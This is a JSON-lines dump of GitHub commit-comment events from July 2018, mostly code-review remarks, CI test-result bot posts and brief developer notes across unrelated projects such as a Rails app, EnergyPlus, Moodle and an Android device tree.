{"id":"7984543896","type":"CommitCommentEvent","actor":{"login":"hollyze"},"repo":{"name":"hollyze/oops"},"payload":{"comment":{"id":29753746,"position":null,"line":null,"path":null,"commit_id":"588d4f78723f5dd3b0aeb4881080ba52a64119d3","created_at":"2018-07-18T17:57:40Z","updated_at":"2018-07-18T17:57:40Z","author_association":"OWNER","body":"jjlkj"}},"created_at":"2018-07-18T17:57:40Z"}
{"id":"7984545072","type":"CommitCommentEvent","actor":{"login":"ameserole"},"repo":{"name":"shareef12/ctfd-portable-challenges-plugin"},"payload":{"comment":{"id":29753750,"position":null,"line":null,"path":null,"commit_id":"15770832ba91dccb4012ae6da1edec47a3fdc1fb","created_at":"2018-07-18T17:57:54Z","updated_at":"2018-07-18T17:57:54Z","author_association":"NONE","body":"If you would like to make a PR against the TAMUctf one we will most likely accept it."}},"created_at":"2018-07-18T17:57:54Z"}
{"id":"7984547497","type":"CommitCommentEvent","actor":{"login":"cosmicdan"},"repo":{"name":"lineage-o-x2/android_device_leeco_msm8996-common"},"payload":{"comment":{"id":29753760,"position":15,"line":15,"path":"rootdir/etc/init.treblecompat.sh","commit_id":"fed93e799d068931eec1c0806fe9d2922a9f3dba","created_at":"2018-07-18T17:58:22Z","updated_at":"2018-07-18T17:58:22Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-18T17:58:22Z"}
{"id":"7984547760","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29753763,"position":null,"line":null,"path":null,"commit_id":"105b0a86a6d7216b6112bd09fb98b1f3620995de","created_at":"2018-07-18T17:58:25Z","updated_at":"2018-07-18T17:58:25Z","author_association":"COLLABORATOR","body":"I only commented out code in HeatMapTask.java, as my benchmark for whether or not the implementation was successful was whether or not the heat map displayed. Easily reversible."}},"created_at":"2018-07-18T17:58:25Z"}
{"id":"7984549686","type":"CommitCommentEvent","actor":{"login":"hollyze"},"repo":{"name":"hollyze/oops"},"payload":{"comment":{"id":29753770,"position":null,"line":null,"path":null,"commit_id":"588d4f78723f5dd3b0aeb4881080ba52a64119d3","created_at":"2018-07-18T17:58:48Z","updated_at":"2018-07-18T17:58:48Z","author_association":"OWNER","body":"add first message"}},"created_at":"2018-07-18T17:58:48Z"}
{"id":"7984550173","type":"CommitCommentEvent","actor":{"login":"cosmicdan"},"repo":{"name":"lineage-o-x2/android_device_leeco_msm8996-common"},"payload":{"comment":{"id":29753771,"position":null,"line":null,"path":null,"commit_id":"fed93e799d068931eec1c0806fe9d2922a9f3dba","created_at":"2018-07-18T17:58:53Z","updated_at":"2018-07-18T17:58:53Z","author_association":"NONE","body":"Don't forget, you'll need a kernel with dm-verity disabled for this to work!"}},"created_at":"2018-07-18T17:58:53Z"}
{"id":"7984550358","type":"CommitCommentEvent","actor":{"login":"igor-apolinario"},"repo":{"name":"igor-apolinario/curso-javascript-ninja"},"payload":{"comment":{"id":29753772,"position":104,"line":116,"path":"challenge-04/README.md","commit_id":"2d9807c60608bf7734d2bd46c340e030f84e82d0","created_at":"2018-07-18T17:58:56Z","updated_at":"2018-07-18T17:58:56Z","author_association":"OWNER","body":"Desenvolvi a solução no **console**.\r\n\r\ncarro.adicionarPessoas = pessoas => {\r\n    if (carro.quantidadePessoas === carro.assentos) {\r\n        return \"O carro já está lotado!\";\r\n    } else if ((carro.quantidadePessoas + pessoas) > (carro.assentos)) {\r\n        return `Só cabem mais ${(carro.assentos - carro.quantidadePessoas)} ${((carro.assentos - carro.quantidadePessoas) === 1)} : 'pessoa' ? 'pessoas'`;\r\n    } else if ((carro.quantidadePessoas + pessoas) <= carro.assentos ) {\r\n        carro.quantidadePessoas = carro.quantidadePessoas + pessoas;\r\n\t\treturn `Já temos ${carro.quantidadePessoas} pessoas no carro!`;\r\n    } else {\r\n        return 'Deu ruim!';\r\n    }\r\n}\r\n\r\n_A única coisa que deve ser reparada é o if ternário para saber se deve ser exibido pessoas ou pessoa._"}},"created_at":"2018-07-18T17:58:56Z"}
{"id":"7984550461","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753773,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:58:57Z","updated_at":"2018-07-18T17:58:57Z","author_association":"MEMBER","body":"If you find situations where many/all attributes are null, you can still use the string-key, just instead of only concatenating attribute values, prefix each value with its' attribute name."}},"created_at":"2018-07-18T17:58:57Z"}
{"id":"7984673984","type":"CommitCommentEvent","actor":{"login":"RDmitchell"},"repo":{"name":"SEED-platform/seed"},"payload":{"comment":{"id":29754105,"position":null,"line":null,"path":null,"commit_id":"3e382b54069af7bd8fd18bbda09113f7821670ca","created_at":"2018-07-18T18:23:04Z","updated_at":"2018-07-18T18:23:04Z","author_association":"NONE","body":"Hopefully this fix will help the import problem in #1565 "}},"created_at":"2018-07-18T18:23:04Z"}
{"id":"7984711913","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29754195,"position":null,"line":null,"path":null,"commit_id":"191541496290d077b324491594c4abd32c819195","created_at":"2018-07-18T18:30:46Z","updated_at":"2018-07-18T18:30:46Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b91d70b16a430b7707ec442f7102021160e19afb/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/191541496290d077b324491594c4abd32c819195/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-18T18:30:46Z"}
{"id":"7984615388","type":"CommitCommentEvent","actor":{"login":"mnadareski"},"repo":{"name":"mnadareski/BurnOutSharp"},"payload":{"comment":{"id":29753952,"position":null,"line":null,"path":null,"commit_id":"055fcbbde7512f189684f14af29ef49f51769e02","created_at":"2018-07-18T18:11:29Z","updated_at":"2018-07-18T18:11:29Z","author_association":"OWNER","body":"This is actually 1.03.7...  I'm just stupid."}},"created_at":"2018-07-18T18:11:29Z"}
{"id":"7984675134","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29754109,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-18T18:23:19Z","updated_at":"2018-07-18T18:23:19Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: Tests Failed (1386 of 2945 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.06%25-red.png)</a> \n"}},"created_at":"2018-07-18T18:23:19Z"}
{"id":"7984675735","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754112,"position":21,"line":21,"path":"app/views/shared/_navbar.html.erb","commit_id":"71aedd7f472cfaaf6ac1fc9f08d199b2a4b74ce1","created_at":"2018-07-18T18:23:25Z","updated_at":"2018-07-18T18:23:25Z","author_association":"NONE","body":"i hope these would be fixed in a commit later."}},"created_at":"2018-07-18T18:23:25Z"}
{"id":"7984778728","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29754363,"position":null,"line":null,"path":null,"commit_id":"457752f808a2b9f56b3e87611655e7538cb3d403","created_at":"2018-07-18T18:43:59Z","updated_at":"2018-07-18T18:43:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T18:43:59Z"}
{"id":"7984748588","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754286,"position":6,"line":20,"path":"app/helpers/application_helper.rb","commit_id":"5399152f054c4ca0b9e48d4b711098f4f3c13cc2","created_at":"2018-07-18T18:38:02Z","updated_at":"2018-07-18T18:38:02Z","author_association":"NONE","body":"we avoid using ! conditions as long as its not necessary.\r\n\r\nand we have two options why go with ! first. ? "}},"created_at":"2018-07-18T18:38:02Z"}
{"id":"7984643946","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754016,"position":1,"line":1,"path":"test/controllers/home_controller_test.rb","commit_id":"4011f951a6781cc99fa95a01f24293a113bb8456","created_at":"2018-07-18T18:17:07Z","updated_at":"2018-07-18T18:17:07Z","author_association":"NONE","body":"remove these test files from now on."}},"created_at":"2018-07-18T18:17:07Z"}
{"id":"7984621817","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"asad451/PMS"},"payload":{"comment":{"id":29753966,"position":1,"line":1,"path":"test/controllers/home_controller_test.rb","commit_id":"d44dcedc2ec02178a33fab5bff033fcd05156844","created_at":"2018-07-18T18:12:45Z","updated_at":"2018-07-18T18:12:45Z","author_association":"NONE","body":"From now on remove these test related files as we don't need them."}},"created_at":"2018-07-18T18:12:45Z"}
{"id":"7984782662","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29754372,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T18:44:48Z","updated_at":"2018-07-18T18:44:48Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T18:44:48Z"}
{"id":"7984727149","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754232,"position":6,"line":20,"path":"app/helpers/application_helper.rb","commit_id":"5399152f054c4ca0b9e48d4b711098f4f3c13cc2","created_at":"2018-07-18T18:33:46Z","updated_at":"2018-07-18T18:33:46Z","author_association":"NONE","body":"indentation....ignoring the other places this happened in this commit.\r\nbut fix it please."}},"created_at":"2018-07-18T18:33:46Z"}
{"id":"7984666987","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29754074,"position":null,"line":null,"path":null,"commit_id":"028bd76e37d570e507f8498bdd7dffab24c6d8f1","created_at":"2018-07-18T18:21:36Z","updated_at":"2018-07-18T18:21:36Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#pr-1](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T18:21:36Z"}
{"id":"7984627173","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753979,"position":38,"line":569,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T18:13:47Z","updated_at":"2018-07-18T18:13:47Z","author_association":"MEMBER","body":"There's quite a lot of duplication here between all of the properties of the record and the `$chapterid` conditon. We're also not returning the modified record. Can we pull the record object out of the conditional and just add properties to it? e.g.:\r\n\r\n```php\r\nif (!$chapterid) {\r\n    return;\r\n}\r\n\r\n$progressrecord = mod_book_current_progress($userid, $bookid);\r\nif ($progressrecord) {\r\n    $progressrecord->chapterid = $chapterid;\r\n    $DB->update_record('book_progress', $progressrecord);\r\n} else {\r\n    $progressrecord = (object) [\r\n        'userid' => $userid,\r\n        'bookid' => $bookid,\r\n        'chapterid' => $chapterid,\r\n    ];\r\n    $progressrecord->id = $DB->insert_record('book_progress', $progressrecord);\r\n}\r\n\r\nreturn $progressrecord;\r\n```"}},"created_at":"2018-07-18T18:13:47Z"}
{"id":"7984649298","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754026,"position":3,"line":1,"path":"app/views/home/index.html.erb","commit_id":"baf6e7262612485bce6c196449801243a2438645","created_at":"2018-07-18T18:18:11Z","updated_at":"2018-07-18T18:18:11Z","author_association":"NONE","body":"indentation is not right, we are going to follow a 2 space nested spacing model."}},"created_at":"2018-07-18T18:18:11Z"}
{"id":"7984671299","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754093,"position":2,"line":2,"path":"app/assets/stylesheets/style.scss","commit_id":"71aedd7f472cfaaf6ac1fc9f08d199b2a4b74ce1","created_at":"2018-07-18T18:22:31Z","updated_at":"2018-07-18T18:22:31Z","author_association":"NONE","body":"indentation issue."}},"created_at":"2018-07-18T18:22:31Z"}
{"id":"7984585144","type":"CommitCommentEvent","actor":{"login":"rizwanreza"},"repo":{"name":"pivotal-cf/om"},"payload":{"comment":{"id":29753862,"position":null,"line":null,"path":null,"commit_id":"45157b9b011d7caf94d138cd936c87e10e812038","created_at":"2018-07-18T18:05:32Z","updated_at":"2018-07-18T18:05:32Z","author_association":"MEMBER","body":"@mcwumbly \r\nhttps://github.com/pivotal-cf/om/commit/1d1fa9354d4cf41de1ebca22c172b7c4404e8911"}},"created_at":"2018-07-18T18:05:32Z"}
{"id":"7984801753","type":"CommitCommentEvent","actor":{"login":"gvillalta99"},"repo":{"name":"SunsetRiders/barebones-typescript-backend"},"payload":{"comment":{"id":29754411,"position":null,"line":null,"path":null,"commit_id":"8d6729139426db41decb4c445f38edd58d4ccd89","created_at":"2018-07-18T18:48:38Z","updated_at":"2018-07-18T18:48:38Z","author_association":"NONE","body":"👎 "}},"created_at":"2018-07-18T18:48:38Z"}
{"id":"7984801814","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29754412,"position":null,"line":null,"path":null,"commit_id":"0bb7d569595c90fb612ab5ee10c003035a137043","created_at":"2018-07-18T18:48:38Z","updated_at":"2018-07-18T18:48:38Z","author_association":"COLLABORATOR","body":"My mistake in the commit message here, it is `[desktop]`"}},"created_at":"2018-07-18T18:48:38Z"}
{"id":"7984679166","type":"CommitCommentEvent","actor":{"login":"boldtrn"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":29754119,"position":31,"line":502,"path":"api/src/main/java/com/graphhopper/util/PointList.java","commit_id":"2f9838ba3e9601b1df0163c04a4f910849834d8b","created_at":"2018-07-18T18:24:06Z","updated_at":"2018-07-18T18:24:06Z","author_association":"MEMBER","body":"Interesting question :). \r\n\r\nMy first idea was: also a shallow copy.\r\n\r\nBut on second thought I think a deep copy can make sense as well. If you have a piece of code that wants to modify the copy you can use any PointList, including a shallow copy for this method. Performance wise there shouldn't be downside eithers?"}},"created_at":"2018-07-18T18:24:06Z"}
{"id":"7984679787","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754121,"position":3,"line":3,"path":"app/helpers/application_helper.rb","commit_id":"97650fff9dad6288dff8206135bd6ef15e247b25","created_at":"2018-07-18T18:24:13Z","updated_at":"2018-07-18T18:24:13Z","author_association":"NONE","body":"indentation..."}},"created_at":"2018-07-18T18:24:13Z"}
{"id":"7984679979","type":"CommitCommentEvent","actor":{"login":"camilo86"},"repo":{"name":"michaelasper/Holograph"},"payload":{"comment":{"id":29754122,"position":null,"line":null,"path":null,"commit_id":"414f295d01c7e39c8613f3ccddc6ed182d9352c8","created_at":"2018-07-18T18:24:16Z","updated_at":"2018-07-18T18:24:16Z","author_association":"COLLABORATOR","body":"Very nice!\n\nOn Tue, Jul 17, 2018 at 6:41 PM, Ming Zhang <notifications@github.com>\nwrote:\n\n> also there's a typo in the commit message\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/michaelasper/Holograph/commit/414f295d01c7e39c8613f3ccddc6ed182d9352c8#commitcomment-29742970>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACV0aFKJOhAtwDDtznpAT2n0adDF3RaWks5uHpI3gaJpZM4P_HpB>\n> .\n>\n"}},"created_at":"2018-07-18T18:24:16Z"}
{"id":"7984590061","type":"CommitCommentEvent","actor":{"login":"lukemaurer"},"repo":{"name":"GaloisInc/crucible"},"payload":{"comment":{"id":29753875,"position":42,"line":42,"path":"crucible/src/Lang/Crucible/Utils/RegRewrite.hs","commit_id":"7aaaa0482ffb880e36665310dac1d36ac87643d4","created_at":"2018-07-18T18:06:30Z","updated_at":"2018-07-18T18:06:30Z","author_association":"NONE","body":"We could. Actually, that's growing on me as we could also use that datakind as an index into the state type (I always like it when inapplicable fields just aren't there).\n\n- Luke\n\n> On Jul 18, 2018, at 9:20 AM, Tristan Ravitch <notifications@github.com> wrote:\n> \n> Could we avoid some bad states here if we used a phantom type? For example, we could change the type of the second callback to TermStmt s ret -> Annotator Term ext s ret () (the first callback would become Stmt ext s -> Annotator NonTerm ext s ret (). Then we could make it so that addStmtAfter is only callable in the NonTerm context (addStmtBefore could be totally unconstrained).\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-18T18:06:30Z"}
{"id":"7984660285","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29754047,"position":20,"line":223,"path":"mod/book/view.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T18:20:18Z","updated_at":"2018-07-18T18:20:18Z","author_association":"MEMBER","body":"Is there a reason we can't do this before sending the header with `redirect()`?"}},"created_at":"2018-07-18T18:20:18Z"}
{"id":"7984559902","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29753810,"position":9,"line":79,"path":"test/tests.js","commit_id":"c7b94a5b5eb6415d4808e40f6b2faeaf702f6a1d","created_at":"2018-07-18T18:00:39Z","updated_at":"2018-07-18T18:00:39Z","author_association":"OWNER","body":"1) Contract: Splitter\r\nbase.js:266\r\n       Testing the constructor behaves correctly under correct and incorrect usages.\r\n         Constructor succeeds, state correctly populated given different addresses.:\r\n     TypeError: promise is not a function\r\n      at chain.reduced.chain.then (test/sequentialPromise.js:13:33)\r\n      at tryCatcher (node_modules/bluebird/js/release/util.js:16:23)\r\n      at Promise._settlePromiseFromHandler (node_modules/bluebird/js/release/promise.js:512:31)\r\n      at Promise._settlePromise (node_modules/bluebird/js/release/promise.js:569:18)\r\n\r\nSomewhere around here. Can't see what's wrong with what I've done."}},"created_at":"2018-07-18T18:00:39Z"}
{"id":"7984681869","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29754125,"position":null,"line":null,"path":null,"commit_id":"a5a130b95af6a6c1ea2e710ba435ea4dc3ee4372","created_at":"2018-07-18T18:24:39Z","updated_at":"2018-07-18T18:24:39Z","author_association":"MEMBER","body":"no i was surposed to do that will push fix for typo soon"}},"created_at":"2018-07-18T18:24:39Z"}
{"id":"7984685125","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754130,"position":2,"line":2,"path":"app/views/shared/_flash_messages.html.erb","commit_id":"97650fff9dad6288dff8206135bd6ef15e247b25","created_at":"2018-07-18T18:25:18Z","updated_at":"2018-07-18T18:25:18Z","author_association":"NONE","body":"spacing issue in between ||"}},"created_at":"2018-07-18T18:25:18Z"}
{"id":"7984794337","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754399,"position":5,"line":7,"path":"app/models/user.rb","commit_id":"43feb598acb4dac471333192972e4109dc0c833f","created_at":"2018-07-18T18:47:08Z","updated_at":"2018-07-18T18:47:08Z","author_association":"NONE","body":"i guess both validations for username can be added in one line."}},"created_at":"2018-07-18T18:47:08Z"}
{"id":"7984593264","type":"CommitCommentEvent","actor":{"login":"dahlstrom-g"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29753882,"position":12,"line":37,"path":"java/openapi/src/com/intellij/codeInsight/NullableNotNullDialog.java","commit_id":"1bd3a97d1f3731aa0f267b6d2c828a41c986c6a5","created_at":"2018-07-18T18:07:09Z","updated_at":"2018-07-18T18:07:09Z","author_association":"CONTRIBUTOR","body":"… in commit a1cec5a, I see. Thank you!"}},"created_at":"2018-07-18T18:07:09Z"}
{"id":"7984820021","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754452,"position":8,"line":8,"path":"app/views/shared/_logged_in_user.html.erb","commit_id":"6598cc721601941466bb82e18016bbbaf65a88e8","created_at":"2018-07-18T18:52:14Z","updated_at":"2018-07-18T18:52:14Z","author_association":"NONE","body":"use link_to instead of these <a....> tags"}},"created_at":"2018-07-18T18:52:14Z"}
{"id":"7984687742","type":"CommitCommentEvent","actor":{"login":"dchiu911"},"repo":{"name":"AlineTalhouk/diceR"},"payload":{"comment":{"id":29754136,"position":null,"line":null,"path":null,"commit_id":"d5027c161cea3f1c563abd86165b0ea8088e8dc2","created_at":"2018-07-18T18:25:49Z","updated_at":"2018-07-18T18:25:49Z","author_association":"COLLABORATOR","body":"caret --> recipes --> ddalpha --> sfsmisc "}},"created_at":"2018-07-18T18:25:49Z"}
{"id":"7984691652","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754147,"position":20,"line":20,"path":"app/views/shared/_flash_messages.html.erb","commit_id":"97650fff9dad6288dff8206135bd6ef15e247b25","created_at":"2018-07-18T18:26:36Z","updated_at":"2018-07-18T18:26:36Z","author_association":"NONE","body":"move this to coffee files."}},"created_at":"2018-07-18T18:26:36Z"}
{"id":"7984806767","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754421,"position":2,"line":2,"path":"db/migrate/20180718073023_add_username_and_contact_to_user.rb","commit_id":"43feb598acb4dac471333192972e4109dc0c833f","created_at":"2018-07-18T18:49:36Z","updated_at":"2018-07-18T18:49:36Z","author_association":"NONE","body":"if this was to happen in one commit then we could have worked with 1 migration here, instead of two."}},"created_at":"2018-07-18T18:49:36Z"}
{"id":"7984726789","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29754230,"position":null,"line":null,"path":null,"commit_id":"a81d53583b281fad4c1f144461bd2004f734f7a9","created_at":"2018-07-18T18:33:42Z","updated_at":"2018-07-18T18:33:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gerar estatísticas na forma de relatório para o ADM](https://trello.com/c/BgeJC9Kj/218-gerar-estat%C3%ADsticas-na-forma-de-relat%C3%B3rio-para-o-adm)"}},"created_at":"2018-07-18T18:33:42Z"}
{"id":"7984625741","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"asad451/PMS"},"payload":{"comment":{"id":29753975,"position":4,"line":20,"path":"Gemfile","commit_id":"3f636787af1e08240f49034cc4c329cfe2beca66","created_at":"2018-07-18T18:13:30Z","updated_at":"2018-07-18T18:13:30Z","author_association":"NONE","body":"any reason why we are so choosy about the version here?"}},"created_at":"2018-07-18T18:13:30Z"}
{"id":"7984630767","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"asad451/PMS"},"payload":{"comment":{"id":29753988,"position":5,"line":12,"path":"app/views/layouts/application.html.erb","commit_id":"3f636787af1e08240f49034cc4c329cfe2beca66","created_at":"2018-07-18T18:14:32Z","updated_at":"2018-07-18T18:14:32Z","author_association":"NONE","body":"indentation is not right here.\r\nPlease keep in mind we need to follow a two space nested spacing model."}},"created_at":"2018-07-18T18:14:32Z"}
{"id":"7984803467","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29754415,"position":null,"line":null,"path":null,"commit_id":"105b0a86a6d7216b6112bd09fb98b1f3620995de","created_at":"2018-07-18T18:48:57Z","updated_at":"2018-07-18T18:48:57Z","author_association":"COLLABORATOR","body":"Realized that I haven't been using ModelUtils in a static context, will fix this in next commit."}},"created_at":"2018-07-18T18:48:57Z"}
{"id":"7984838522","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer-basics"},"payload":{"comment":{"id":29754501,"position":null,"line":null,"path":null,"commit_id":"5436c2dd86e1b8f0dc525bb033344c1632b49803","created_at":"2018-07-18T18:55:58Z","updated_at":"2018-07-18T18:55:58Z","author_association":"CONTRIBUTOR","body":"https://github.com/phetsims/equality-explorer/issues/125"}},"created_at":"2018-07-18T18:55:58Z"}
{"id":"7984840063","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer-two-variables"},"payload":{"comment":{"id":29754504,"position":null,"line":null,"path":null,"commit_id":"d1ba3eeb8b36baea7eb6a9a0f04da2b546067a63","created_at":"2018-07-18T18:56:16Z","updated_at":"2018-07-18T18:56:16Z","author_association":"CONTRIBUTOR","body":"https://github.com/phetsims/equality-explorer/issues/125"}},"created_at":"2018-07-18T18:56:16Z"}
{"id":"7984809438","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29754425,"position":2,"line":2,"path":"app/views/shared/_logged_in_user.html.erb","commit_id":"6598cc721601941466bb82e18016bbbaf65a88e8","created_at":"2018-07-18T18:50:08Z","updated_at":"2018-07-18T18:50:08Z","author_association":"NONE","body":"spacing issue.\r\n"}},"created_at":"2018-07-18T18:50:08Z"}
{"id":"7984840698","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29754506,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T18:56:24Z","updated_at":"2018-07-18T18:56:24Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-18T18:56:24Z"}
{"id":"7984748064","type":"CommitCommentEvent","actor":{"login":"Rohan-Bansal"},"repo":{"name":"Rohan-Bansal/AlchemyCards"},"payload":{"comment":{"id":29754283,"position":null,"line":null,"path":null,"commit_id":"795e691ce626d1d99e6909188c9dae7f04fb49d2","created_at":"2018-07-18T18:37:55Z","updated_at":"2018-07-18T18:37:55Z","author_association":"OWNER","body":"External library."}},"created_at":"2018-07-18T18:37:55Z"}
